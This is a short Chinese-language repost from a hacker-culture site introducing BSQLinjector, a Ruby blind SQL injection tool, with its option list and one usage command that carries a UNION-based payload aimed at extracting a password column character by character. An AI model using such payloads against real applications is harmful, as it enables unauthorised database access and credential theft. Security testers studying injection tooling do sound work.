记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

SQL盲注利用工具 – BSQLinjector

2016-01-16 16:50

SQL盲注利用工具 – BSQLinjector-安全盒子

BSQLinjector是使用Ruby语言编写的一款SQL盲注利用工具,它使用盲注方法从SQL数据库中检索数据。建议在将其发送到一个应用程序之前,使用”–test”开关来清楚地查看配置后的负载看起来是什么样的。

选项介绍

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
--file(强制),文件包含有效的HTTP请求和SQL注入点(SQLINJECT)。(--file=/tmp /req.txt)
--pattern(强制),当查询为true时,用于查找的模式。(--pattern= truestatement)
--prepend(强制),主要载荷。(--prepend=”abcd'and'a'='b'+union+select+' truestatement'+from+table+where+col% 3d'value'+and+substr(password,”
--append,如何结束我们的有效载荷。例如,注释掉剩下的SQL语句。(--append= '#
--2ndfile,文件包含有效的HTTP请求,用于二次利用。(--2ndfile=/tmp/2ndreq.txt)
--mode,使用盲模式(在-b(产生少量请求),更少-a(通过使用"<"、">"、"="字符产生更少请求),like -l(完全强制),equals –e(完全强制))。(--mode=l)
--hex,使用十六进制进行比较,而不是字符。
--case,大小写敏感。
--ssl,使用SSL。
--proxy,使用的代理。(--proxy=127.0.0.1:8080)
--test,开启测试模式。不发送请求,仅仅显示完整的有效载荷。
--comma,编码逗号。
--bracket,向substring函数末尾添加括号。--bracket=”))”
--schar,在字符周围放置的字符。在十六进制模式下不使用这个字符。(--schar=”’”)
--special,在枚举中包含所有的特殊字符。
--start,从特定的字符开始枚举。(--start=10)
--max,枚举的最大字符数量。(--max=10)
--timeout,等待响应的超时时间。(--timeout=20)
--verbose,显示详细信息。

使用举例

1
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

GitHub项目地址  

点我下载

知识来源: www.secbox.cn/hacker/12574.html

阅读:136476 | 评论:0 | 标签:黑客

想收藏或者和大家分享这篇好文章→复制链接地址

“SQL盲注利用工具 – BSQLinjector”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云